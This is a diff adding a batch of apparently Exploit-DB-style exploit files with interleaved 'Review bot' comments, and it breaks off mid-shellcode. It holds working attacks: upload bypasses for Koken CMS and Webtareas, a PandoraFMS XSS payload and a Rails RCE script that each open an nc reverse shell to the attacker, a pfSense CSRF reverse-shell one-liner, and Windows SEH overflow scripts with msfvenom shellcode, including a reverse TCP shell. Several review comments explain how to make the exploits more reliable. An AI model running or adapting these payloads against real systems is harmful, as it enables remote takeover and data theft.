+3. Authenticated, go to Koken CMS Dashboard, upload your file on "Import Content" button (Library panel) and send the HTTP request to Burp.
+
+4. On Burp, rename your file to "image.php"
+
+
+POST /koken/api.php?/content HTTP/1.1
+Host: target.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://target.com/koken/admin/
+x-koken-auth: cookie
+Content-Type: multipart/form-data; boundary=---------------------------2391361183188899229525551
+Content-Length: 1043
+Connection: close
+Cookie: PHPSESSID= [Cookie value here]
+
+-----------------------------2391361183188899229525551
+Content-Disposition: form-data; name="name"
+
+image.php
+-----------------------------2391361183188899229525551
+Content-Disposition: form-data; name="chunk"
+
+0
+-----------------------------2391361183188899229525551
+Content-Disposition: form-data; name="chunks"
+
+1
+-----------------------------2391361183188899229525551
+Content-Disposition: form-data; name="upload_session_start"
+
+1594831856
+-----------------------------2391361183188899229525551
+Content-Disposition: form-data; name="visibility"
+
+public
+-----------------------------2391361183188899229525551
+Content-Disposition: form-data; name="license"
+
+all
+-----------------------------2391361183188899229525551
+Content-Disposition: form-data; name="max_download"
+
+none
+-----------------------------2391361183188899229525551
+Content-Disposition: form-data; name="file"; filename="image.php"
+Content-Type: image/jpeg
+
+
+
+-----------------------------2391361183188899229525551--
+
+
+
+5. On Koken CMS Library, select you file and put the mouse on "Download File" to see where your file is hosted on server.
\ No newline at end of file
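Review bot: The PHP file contents at step 1 (L546) and the body of the `file` part at L600–L601 are empty in the committed text, presumably stripped on import, so the PoC cannot be followed from this file; mark the spot with a placeholder such as `[PHP file contents]` rather than leaving blank lines. The write-up says the restriction is an extension whitelist, yet step 4 bypasses it by renaming `image.php.jpg` to `image.php` in the request, which only makes sense if the extension check runs client-side or against a different name than the one finally stored — the advisory should say which, since that is what a defender needs in order to verify a fix. Typo at L540: `withelist` → `whitelist`.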
diff --git a/exploits/php/webapps/48707.txt b/exploits/php/webapps/48707.txt
new file mode 100644
index 000000000..4630d3270
--- /dev/null
+++ b/exploits/php/webapps/48707.txt
@@ -0,0 +1,118 @@
+# Exploit Title: PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting
+# Date: 2020-07-01
+# Author: AppleBois
+# Version: 7xx ≤ 746 
+# Homepage: https://pandorafms.org/
+# Software Link: https://sourceforge.net/projects/pandora/files/Pandora FMS 7.0NG/
+# CVE-2020-11749
+# 
+# By asking network administrator to scan SNMP device to trigger Cross Site Scripting(XSS)
+# We can call a remote JavaScript file to execute arbitrary code to reach Remote Code Execution
+# on PandoraFMS.
+#
+######################################################################################
+
+//----------------/etc/snmp/snmpd.conf-------------------//
+syscontact       
+syslocation     
+sysname         
+sysDesc		
+
+com2sec local   localhost       public
+view    systemview      included        .1.3.6.1.2.1.1
+view    systemview      included        .1.3.6.1.2.1.25.1
+view    systemview      included        .1      80
+
+rocommunity     public
+//--------------end of /etc/snmp/snmpd.conf--------------//
+
+
+
+//----------------shell.js-------------------------------//
+//Create Random String
+function randomString(len, charSet) {
+    charSet = charSet || 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
+    var randomString = '';
+    for (var i = 0; i < len; i++) {
+        var randomPoz = Math.floor(Math.random() * charSet.length);
+        randomString += charSet.substring(randomPoz,randomPoz+1);
+    }
+    return randomString;
+}
+var randomValue = randomString(5);
+
+//Declare Variable
+var xhr= new XMLHttpRequest();
+var Attacker_IP= "192.168.11.130";
+var Pandora_IP ="192.168.11.132";
+var port ="4444";
+//var payload="form_name="+randomValue+"&form_plugin_type=0&form_max_timeout5f09468e5082e_select=15&form_max_timeout5f09468e5082e_text=15&form_max_timeout=15&form_max_timeout5f09468e5082e_units=1&form_description=Created+By+AppleBois&form_execute=nc+-nv+"+Attacker_IP+"+"+port+"+-e+%2Fbin%2Fsh&form_parameters=&field1_macro=_field1_&field1_desc=&field1_value=&field1_help=&crtbutton=Create"
+var payload ="form_name="+randomValue+"&form_plugin_type=0&form_max_timeout5f096ea47b224_select=15&form_max_timeout5f096ea47b224_text=15&form_max_timeout=15&form_max_timeout5f096ea47b224_units=1&form_description=Created+By+AppleBois&form_execute=nc+-nv+"+Attacker_IP+"+"+port+"+-e+%2Fbin%2Fsh&form_parameters=&field1_macro=_field1_&field1_desc=&field1_value=&uptbutton=Update"
+var url= "http://"+Pandora_IP+"/pandora_console/index.php?sec=gservers&sec2=godmode/servers/plugin&tab=plugins&create_plugin=1&pure=";
+
+//Create a plugin with malicous command
+xhr.open("POST",url,true);
+xhr.setRequestHeader("User-Agent","Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0");
+xhr.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*//'*;q=0.8");
+xhr.setRequestHeader("Accept-Language","en-US,en;q=0.5");
+xhr.setRequestHeader("Accept-Encoding","gzip, deflate");
+xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
+xhr.setRequestHeader("Referer","http://"+Pandora_IP+"/pandora_console/index.php?sec=gservers&sec2=godmode/servers/plugin&tab=&view=1&tab=plugins&pure=");
+xhr.setRequestHeader("Content-Length",payload.length);
+xhr.setRequestHeader("Connection","close");
+xhr.setRequestHeader("Upgrade-Insecure-Requests","1");
+xhr.send(payload);
+
+//I am sleepy, i just want to sleep 5 seconds. Please 
+function sleep(miliseconds) {
+                var currentTime = new Date().getTime();
+                while (currentTime + miliseconds >= new Date().getTime()) {
+                }
+            }
+sleep(5000);
+
+//Grab newly added Plugin ID
+var url="/pandora_console/index.php?sec=gagente&sec2=godmode/agentes/configurar_agente&tab=module&id_agente=2";
+xhr.open("POST",url,false);
+xhr.setRequestHeader("User-Agent","Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0");
+xhr.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*//'*;q=0.8");
+xhr.setRequestHeader("Accept-Language","en-US,en;q=0.5");
+xhr.setRequestHeader("Accept-Encoding","gzip, deflate");
+xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
+xhr.setRequestHeader("Referer","http://"+Pandora_IP+"/pandora_console/index.php?sec=gservers&sec2=godmode/servers/plugin&tab=&view=1&tab=plugins&pure=");
+xhr.setRequestHeader("Content-Length",payload.length);
+xhr.setRequestHeader("Connection","close");
+xhr.setRequestHeader("Upgrade-Insecure-Requests","1");
+xhr.setRequestHeader("Cache-Control","max-age=0");
+var payload ="status_hierachy_mode_sent=1&moduletype=pluginserver&edit_module=1&updbutton=Create";
+xhr.send(payload)
+
+var el = document.createElement('html');
+var add=xhr.responseText.toString();
+el.innerHTML = add;
+var dd = el.querySelector('#id_plugin');
+var plugin_ID =0;
+for (i = 0; i < dd.options.length; i++) {
+	if(dd.options[i].text == randomValue)
+	{
+	   console.log(dd.options[i].value);
+ 	   plugin_ID=dd.options[i].value;
+	   break;
+	}
+}
+
+//Create a new plugin in server module || reverse shell will trigger here 
+var url = "http://"+Pandora_IP+"/pandora_console/index.php?sec=gagente&sec2=godmode/agentes/configurar_agente&tab=module&id_agente=2";
+var payload ="network_component_group=0&id_module_component_type=4&network_component=0&name=AppleBois_"+randomValue+"&disabled_sent=1&id_module_group=1&id_module_type_hidden=1&id_module_type=1&type_names=eyIxIjoiZ2VuZXJpY19kYXRhIiwiMiI6ImdlbmVyaWNfcHJvYyIsIjMiOiJnZW5lcmljX2RhdGFfc3RyaW5nIiwiNCI6ImdlbmVyaWNfZGF0YV9pbmMiLCI1IjoiZ2VuZXJpY19kYXRhX2luY19hYnMifQ%3D%3D&min_warning=0&max_warning=0&str_warning=&warning_inverse_sent=1&min_critical=0&max_critical=0&str_critical=&critical_inverse_sent=1&history_data=1&history_data_sent=1&id_plugin="+plugin_ID+"¯os=eyIxIjp7Im1hY3JvIjoiX2ZpZWxkMV8iLCJkZXNjIjoiIiwiaGVscCI6IiIsInZhbHVlIjoiIiwiaGlkZSI6IiJ9fQ%3D%3D¯o_name%5B%5D=macro_value&custom_id=&unit_select=none&unit_text=&unit=&module_interval_select=300&module_interval_text=5&module_interval=300&module_interval_units=60&moduletype=4&post_process_select=&post_process_text=&post_process=&min=&max=&dynamic_interval_select=0&dynamic_interval_text=&dynamic_interval=None&dynamic_interval_units=1&dynamic_min=0&dynamic_max=0&dynamic_two_tailed_sent=1&id_export=0&throw_unknown_events_sent=1&ff_type_sent=1&each_ff=0&ff_event=0&ff_event_normal=&ff_event_warning=&ff_event_critical=&module_ff_interval=0&ff_timeout=0&id_tag_selected%5B%5D=&id_tag_policy%5B%5D=&quiet_module_sent=1&cps_module=0&description=&critical_instructions=&warning_instructions=&unknown_instructions=&hour_from=*&minute_from=*&mday_from=*&month_from=*&wday_from=*&hour_to=*&minute_to=*&mday_to=*&month_to=*&wday_to=*&max_timeout=0&max_retries=0&id_category=0&parent_module_id=0&autocomplete_agent_name=&agent_autocomplete_idagent_5f0967a872ce2=0&relation_type=direct&crtbutton=Create&id_module=4&create_module=1";
+xhr.open("POST",url,true);
+xhr.setRequestHeader("User-Agent","Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0");
+xhr.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
+xhr.setRequestHeader("Accept-Language","en-US,en;q=0.5");
+xhr.setRequestHeader("Accept-Encoding","gzip, deflate");
+xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
+xhr.setRequestHeader("Referer","http://"+Pandora_IP+"/pandora_console/index.php?sec=gagente&sec2=godmode/agentes/configurar_agente&tab=module&id_agente=2");
+xhr.setRequestHeader("Content-Length",payload.length);
+xhr.setRequestHeader("Connection","close");
+xhr.setRequestHeader("Upgrade-Insecure-Requests","1");
+xhr.send(payload);
+//----------------end of shell.js-------------------------------//
\ No newline at end of file
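Review bot: The module-creation body at L719 contains `¯os=` and `¯o_name%5B%5D=` where `&macros=` and `&macro_name%5B%5D=` appear to be intended — this looks like `&macr` being decoded as the HTML entity `¯` somewhere between the author's capture and this commit, and as stored the query string is malformed. The script reuses one `XMLHttpRequest` object: the first POST is opened asynchronously at L667 and sent at L677, then `xhr.open()` is called again at L689; per the XHR specification `open()` terminates any fetch still in flight on that object, and the busy-wait at L680–L685 does not change that, so open the first request synchronously (`xhr.open("POST",url,false);`, as L689 already does) and drop `sleep`. The `Content-Length`, `Connection`, `Accept-Encoding` and `Referer` headers set at L668–L676, L690–L699 and L721–L729 are forbidden request headers that browsers silently ignore, so those lines are dead. The `form_max_timeout5f096ea47b224_*` field names at L663 look like a per-page-render suffix and are unlikely to match another install; confirm against the form markup. The `syscontact`/`syslocation`/`sysname`/`sysDesc` values at L629–L632 are likewise empty in the committed text, so the injection vector as stored is not reproducible.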
diff --git a/exploits/php/webapps/48709.txt b/exploits/php/webapps/48709.txt
new file mode 100644
index 000000000..0ba847766
--- /dev/null
+++ b/exploits/php/webapps/48709.txt
@@ -0,0 +1,51 @@
+# Exploit Title: Webtareas 2.1p - Arbitrary File Upload (Authenticated)
+# Author: AppleBois
+# Date: 2020-07-10
+# Exploit author : AppleBois
+# Vendor Hompage:https://sourceforge.net/projects/webtareas/
+# Version: 2.1 && 2.1p
+# Tested on: Window 10 64 bit environment || XAMPP
+# Authenticated User allowed to upload ".exe" and ".shtml" to file uploaded directory
+# More information : https://medium.com/@tehwinsam/webtareas-2-1-c8b406c68c2a
+
+POST /Tareas/webtareas/linkedcontent/addfile.php?doc_type=0&doc_type_ex=&doc_id=1&borne15=0&borne16=0 HTTP/1.1
+Host: 10.10.10.2:81
+Content-Length: 711
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://10.10.10.2:81
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHtJ36OtVyQuyaY6y
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://10.10.10.2:81/Tareas/webtareas/linkedcontent/addfile.php?doc_type=0&doc_id=1&borne15=0&borne16=0
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: webTareasSID=vqg1lbhf9g5esjrie84dsrjjhg; ASP.NET_SessionId=vbrb31kd3s5hmz3uobg0smck; UserSettings=language=1; dnn_IsMobile=False; .ASPXANONYMOUS=VA9hDh-1Ldg0FPbBfd9HAWSTqKjasYcZMlHQnpPaoR5WQipK7Q_kKnAlAqfWp0WgtO8HXH2_Tsrhfh-Z7137cng_MeEp3aiMPswVEPZc-UOdZQTp0; __RequestVerificationToken_L0ROTg2=Js5PUWl0BiY3kJLdEPU2oEna_UsEFTrNQiGY986uBwWdRyVDxr2ItTPSUBd07QX6rRyfXQ2; USERNAME_CHANGED=; language=en-US; authentication=DNN; .DOTNETNUKE=CC547735526446773F995D833FACDA646745AE4409516EBF345F1AC725F7D7CE7BFC420BF5EFE9FE2AEC92B04C89CCD2E64C34BA4E195D7D8D6EED7892574DB3FF02599F; ICMSSESSION=mgnp26oubn7hfc590q6j5c9o70
+Connection: close
+
+------WebKitFormBoundaryHtJ36OtVyQuyaY6y
+Content-Disposition: form-data; name="action"
+
+add
+------WebKitFormBoundaryHtJ36OtVyQuyaY6y
+Content-Disposition: form-data; name="file1"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundaryHtJ36OtVyQuyaY6y
+Content-Disposition: form-data; name="attnam1"
+
+a.shtml
+------WebKitFormBoundaryHtJ36OtVyQuyaY6y
+Content-Disposition: form-data; name="atttmp1"
+
+C:/xampp/htdocs/Tareas/webtareas/files/tmpEDE7.tmp
+------WebKitFormBoundaryHtJ36OtVyQuyaY6y
+Content-Disposition: form-data; name="c"
+
+
+------WebKitFormBoundaryHtJ36OtVyQuyaY6y
+Content-Disposition: form-data; name="ver"
+
+1.0
+------WebKitFormBoundaryHtJ36OtVyQuyaY6y--
\ No newline at end of file
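Review bot: The Cookie header carries session and anti-forgery tokens for unrelated applications (`ASP.NET_SessionId`, `.ASPXANONYMOUS`, `__RequestVerificationToken_L0ROTg2`, `.DOTNETNUKE`, `ICMSSESSION`) that look captured from the author's browser rather than required by webTareas; only `webTareasSID` plausibly authenticates this request, and publishing the rest leaks the author's own session material. Trim the line to the single `Cookie: webTareasSID=...` value so readers see which cookie the upload actually depends on. The header block also names the author twice (`# Author:` and `# Exploit author :`) and misspells `Vendor Hompage`.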
diff --git a/exploits/php/webapps/48714.txt b/exploits/php/webapps/48714.txt
new file mode 100644
index 000000000..f1809bd8b
--- /dev/null
+++ b/exploits/php/webapps/48714.txt
@@ -0,0 +1,40 @@
+# Exploit Title: pfSense 2.4.4-p3 - Cross-Site Request Forgery
+# Date: 2019-09-27
+# Exploit Author: ghost_fh
+# Vendor Homepage: https://www.pfsense.org/
+# Software Link: https://www.pfsense.org/download/index.html?section=downloads
+# Version: Till 2.4.4-p3
+# Tested on: freebsd
+# CVE : CVE-2019-16667
+
+# Vulnerability Description :- The pfsense firewall is vulnerable to RCE
+# chained with CSRF as it uses `csrf magic` library since it allows to tamper
+# the CSRF token values submitted when processing the form requests. Due to
+# this flaw, an attacker can exploit this vulnerability by crafting new page
+# that contains attacker's controlled input such as a "reverse shell" (eg:
+# `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip port
+# >/tmp/f`token value) in the form and entice the victims to click
+# on the crafted link via social engineering methods. Once the victim clicks
+# on the link (try again button in this case), the attacker can take the
+# lateral control of the victim's machine and malicious actions can be
+# performed on the victim's behalf.
+
+
+
+
+
+ + + + + +
+ + + +# Create a malicious page containing the above values and once user clicks on malicious link, +# he will be redirected to https://pfsense_ip/diag_command.php page. +# Victim will be greeted with the "Try again" button. +# Once victim clicks on the "Try again" button you will be greeted with reverse shell of the victim. \ No newline at end of file diff --git a/exploits/php/webapps/48715.txt b/exploits/php/webapps/48715.txt new file mode 100644 index 000000000..150301ec8 --- /dev/null +++ b/exploits/php/webapps/48715.txt @@ -0,0 +1,40 @@ +# Exploit Title: Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting +# Google Dork: inurl:"/vam/index_vam_op.php" +# Date: 2020-06-29 +# Exploit Author: Peter Blue +# Vendor Homepage: https://virtualairlinesmanager.net +# Software Link: https://virtualairlinesmanager.net +# Version: 2.6.2 +# Tested on: Linux (Fedora 23), MariaDB, PHP 5.6.29, Apache +# CVE: N/A + + +This project looks nice but lacks a lot of input filtering. + +This example allows a logged-in user to inject JavaScript code, and this +case steal a session ID, but other exploits could be injected. + +This exploit example assumes you have installed VAM 2.6.2 on a local server. + +Steps :- + +1. Log on. There is an admin account: Callsign: vam100, Password: 123456 + +2. Click "Pilot Actions" + +3. Click "Internal Mail" + +4. Click New Message + +5. In "Subject" enter XSS + +6. in "Message" type anything + +7. Click "Send" + +8. When the page refreshes your PHP session ID will show in an alert box + +It is also quite possible to inject raw HTML into the subject. + +A bit of Google Dorking revealed many websites running this, some were +dead, some deserted and a few were live. \ No newline at end of file diff --git a/exploits/ruby/webapps/48716.rb b/exploits/ruby/webapps/48716.rb new file mode 100755 index 000000000..690692267 --- /dev/null +++ b/exploits/ruby/webapps/48716.rb 
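Review bot: The form and values that the closing comments call "the above values" are not visible in this view: between the description and `# Create a malicious page ...` the hunk shows only empty added lines, although the header promises 40 lines, so the markup was presumably stripped in rendering and the file itself should be checked before relying on this text. `# Version: Till 2.4.4-p3` names the last affected release but not the release that fixes CVE-2019-16667, which is the field defenders need for triage; add a `# Fixed in:` line with the patched pfSense release.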
@@ -0,0 +1,32 @@
+# Exploit Title: Rails 5.0.1 - Remote Code Execution
+# Date: 2020-07-19
+# Exploit Author: Lucas Amorim
+# Vendor Homepage: www.rubyonrails.org
+# Software Link: www.rubyonrails.org
+# Version: Rails < 5.0.1
+# Tested on: Linux/OSx
+# CVE : CVE-2020-8163
+# More information: https://github.com/sh286/CVE-2020-8163
+
+#!/usr/bin/ruby
+
+require 'net/http'
+
+def header
+ puts "[*] - CVE-2020-8163 - Remote code execution of user-provided local names in Rails < 5.0.1\n"
+ puts "[*] - Author: Lucas Amorim lucas@lucasamorim.ca"
+ puts "[*] - Usage: \n"
+ puts "ruby exploit.rb "
+end
+if ARGV.length < 3
+ header
+ exit(-1)
+end
+
+url = ARGV[0]
+ip = ARGV[1]
+port = ARGV[2]
+
+puts "[*] Sending payload to #{url}"
+uri = URI(url+"?system(%27nc+-e+/bin/sh+#{ip}+#{port}%27)%3ba%23")
+Net::HTTP.get(uri)
\ No newline at end of file
diff --git a/exploits/windows/dos/48697.py b/exploits/windows/dos/48697.py
new file mode 100755
index 000000000..38f894619
--- /dev/null
+++ b/exploits/windows/dos/48697.py
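Review bot: The `#!/usr/bin/ruby` shebang sits on line 11, after the comment header, so the kernel ignores it and the file cannot be run directly despite its `100755` mode; move it to line 1 or drop the executable bit. The same header-before-shebang layout appears in the Python files 48689.py, 48691.py, 48695.py and 48696.py in this patch. The title says `Rails 5.0.1` while `# Version: Rails < 5.0.1` and the banner printed by `header` say versions below 5.0.1 are affected; make the title and the version line agree. The usage string `puts "ruby exploit.rb "` prints no argument names, so the three positional arguments read from `ARGV` are only discoverable from the code; this looks like angle-bracket placeholders lost in rendering, but the published text should be checked.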
@@ -0,0 +1,33 @@
+# Exploit Title: Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)
+# Date: 2020-07-20
+# Author: Felipe Winsnes
+# Software Link: https://www.exploit-db.com/apps/463c9e7fe9a39888d3c01bc9ad756bba-UpSetup.exe
+# Version: 3.5
+# Tested on: Windows 7 (x86)
+
+# Blog: https://whitecr0wz.github.io/
+
+# Sadly enough, this vulnerability is not exploitable as there are no friendly PPR addresses available and
+# yet the vulnerability is triggered with additional padding == can't use addresses with null values.
+
+# Proof of Concept:
+# 1.- Run the python script, it will create a new file "poc.txt".
+# 2.- Copy the content of the new file 'poc.txt' to clipboard.
+# 3.- Open the Application.
+# 4.- Click on "Settings".
+# 4.- Paste contents of the generated file into the parameters "FTP Address", "Username" and Password". Furthermore, check the box with the statement "Check to save password in preferences".
+# 5.- Crashed.
+# 6.- As uploadpref.dat is generated, every time the application opens it will crash, with the SEH values being overwritten. In order to stop this behavior simply delete the file.
+
+# If the contents are only pasted into "Password", the application will only crash once without creating uploadpref.dat.
+
+buffer = "A" * 477 + "BBBB" + "CCCC" + "\xff" * 2000
+
+try:
+ f = open ("poc.txt", "w")
+ f.write(buffer)
+ f.close()
+ print "[+] The file has been created successfully!"
+
+except:
+ print "[!] There has been an error while creating the file."
\ No newline at end of file
diff --git a/exploits/windows/local/48687.py b/exploits/windows/local/48687.py
new file mode 100755
index 000000000..c4a0d9e5a
--- /dev/null
+++ b/exploits/windows/local/48687.py
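Review bot: The bare `except:` at the end swallows every exception, including `KeyboardInterrupt` and `SystemExit`, and replaces the real cause (a permissions error, a read-only directory) with a generic message; catch the I/O error and show it, e.g. `except (IOError, OSError) as e:` followed by `print "[!] There has been an error while creating the file: %s" % e`, and write the file with `with open("poc.txt", "w") as f:` so the handle is released on the error path too. The `print` statements are Python 2 syntax and the script has no shebang, so the Python 2 requirement belongs in the header alongside `# Tested on`. Two different steps in the proof-of-concept list are both numbered `4.-`.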
@@ -0,0 +1,66 @@ +# Exploit Title: Nidesoft DVD Ripper 5.2.18 - Local Buffer Overflow (SEH) +# Date: 2020-07-26 +# Author: Felipe Winsnes +# Software Link: https://nidesoft-dvd-ripper.softonic.com/ +# Version: 5.2.18 +# Tested on: Windows 7 (x86) + +# Blog: https://whitecr0wz.github.io/ + +# Proof of Concept: +# 1.- Run the python script, it will create the file "poc.txt". +# 2.- Copy the content of the new file "poc.txt" to clipboard +# 3.- Open the application. +# 4.- Paste the clipboard into the "License Code" parameter within registration. +# 5.- Profit. + +import struct + +# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread -b "\x00\x0a\x0d" +# Payload size: 448 bytes + +buf = b"" +buf += b"\x89\xe5\xda\xda\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49" +buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" +buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" +buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" +buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6d\x38\x4c" +buf += b"\x42\x33\x30\x73\x30\x37\x70\x55\x30\x6c\x49\x6b\x55" +buf += b"\x35\x61\x49\x50\x32\x44\x6e\x6b\x42\x70\x66\x50\x6c" +buf += b"\x4b\x56\x32\x74\x4c\x6c\x4b\x42\x72\x75\x44\x6c\x4b" +buf += b"\x54\x32\x31\x38\x74\x4f\x58\x37\x51\x5a\x31\x36\x55" +buf += b"\x61\x6b\x4f\x4c\x6c\x77\x4c\x33\x51\x53\x4c\x35\x52" +buf += b"\x76\x4c\x51\x30\x4f\x31\x78\x4f\x74\x4d\x67\x71\x38" +buf += b"\x47\x68\x62\x4b\x42\x46\x32\x30\x57\x6c\x4b\x71\x42" +buf += b"\x62\x30\x6e\x6b\x61\x5a\x57\x4c\x6c\x4b\x70\x4c\x54" +buf += b"\x51\x63\x48\x49\x73\x63\x78\x43\x31\x4e\x31\x43\x61" +buf += b"\x6c\x4b\x50\x59\x31\x30\x63\x31\x59\x43\x4e\x6b\x77" +buf += b"\x39\x44\x58\x79\x73\x77\x4a\x62\x69\x4c\x4b\x66\x54" +buf += b"\x6c\x4b\x47\x71\x78\x56\x70\x31\x39\x6f\x4c\x6c\x6f" +buf += b"\x31\x58\x4f\x34\x4d\x46\x61\x4b\x77\x46\x58\x4d\x30" +buf += b"\x53\x45\x5a\x56\x45\x53\x73\x4d\x39\x68\x67\x4b\x73" +buf += 
b"\x4d\x51\x34\x74\x35\x79\x74\x53\x68\x6e\x6b\x33\x68" +buf += b"\x67\x54\x47\x71\x69\x43\x71\x76\x4e\x6b\x74\x4c\x30" +buf += b"\x4b\x4c\x4b\x73\x68\x47\x6c\x67\x71\x48\x53\x4c\x4b" +buf += b"\x54\x44\x4c\x4b\x36\x61\x68\x50\x6b\x39\x61\x54\x77" +buf += b"\x54\x76\x44\x63\x6b\x63\x6b\x31\x71\x32\x79\x72\x7a" +buf += b"\x52\x71\x39\x6f\x4b\x50\x31\x4f\x61\x4f\x73\x6a\x6e" +buf += b"\x6b\x65\x42\x48\x6b\x6e\x6d\x61\x4d\x43\x5a\x45\x51" +buf += b"\x4c\x4d\x6e\x65\x6f\x42\x57\x70\x67\x70\x43\x30\x30" +buf += b"\x50\x45\x38\x35\x61\x6c\x4b\x72\x4f\x6f\x77\x39\x6f" +buf += b"\x79\x45\x6f\x4b\x6b\x50\x65\x4d\x67\x5a\x74\x4a\x65" +buf += b"\x38\x6d\x76\x4f\x65\x6d\x6d\x4f\x6d\x49\x6f\x39\x45" +buf += b"\x67\x4c\x67\x76\x73\x4c\x47\x7a\x4f\x70\x4b\x4b\x69" +buf += b"\x70\x32\x55\x47\x75\x6d\x6b\x30\x47\x44\x53\x63\x42" +buf += b"\x62\x4f\x42\x4a\x75\x50\x43\x63\x6b\x4f\x4e\x35\x71" +buf += b"\x73\x31\x71\x30\x6c\x55\x33\x54\x6e\x62\x45\x74\x38" +buf += b"\x53\x55\x65\x50\x41\x41" + +nseh = "\xEB\x11\x41\x41" +seh = struct.pack(" Pack +# 4. 
Paste the clipboard into the "Archive To" field and click on Ok button + +#!/usr/bin/python + +egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x44\x17\x50\x5c" +egg += "\x25\x4A\x50\x5c\x25\x4A" +egg += "\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50" + +# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x13\x14\x15\x16" -f py -e x86/alpha_mixed BufferRegister=EDI +buf = "" +buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" +buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" +buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +buf += "\x69\x6c\x68\x68\x6e\x62\x55\x50\x45\x50\x43\x30\x63" +buf += "\x50\x6e\x69\x6a\x45\x45\x61\x59\x50\x55\x34\x4e\x6b" +buf += "\x52\x70\x76\x50\x6c\x4b\x73\x62\x76\x6c\x6c\x4b\x70" +buf += "\x52\x42\x34\x6e\x6b\x43\x42\x75\x78\x64\x4f\x48\x37" +buf += "\x42\x6a\x71\x36\x65\x61\x39\x6f\x6e\x4c\x67\x4c\x53" +buf += "\x51\x71\x6c\x76\x62\x56\x4c\x67\x50\x79\x51\x78\x4f" +buf += "\x36\x6d\x43\x31\x79\x57\x6d\x32\x4c\x32\x72\x72\x66" +buf += "\x37\x6e\x6b\x72\x72\x56\x70\x6e\x6b\x32\x6a\x75\x6c" +buf += "\x4e\x6b\x62\x6c\x37\x61\x33\x48\x69\x73\x43\x78\x56" +buf += 
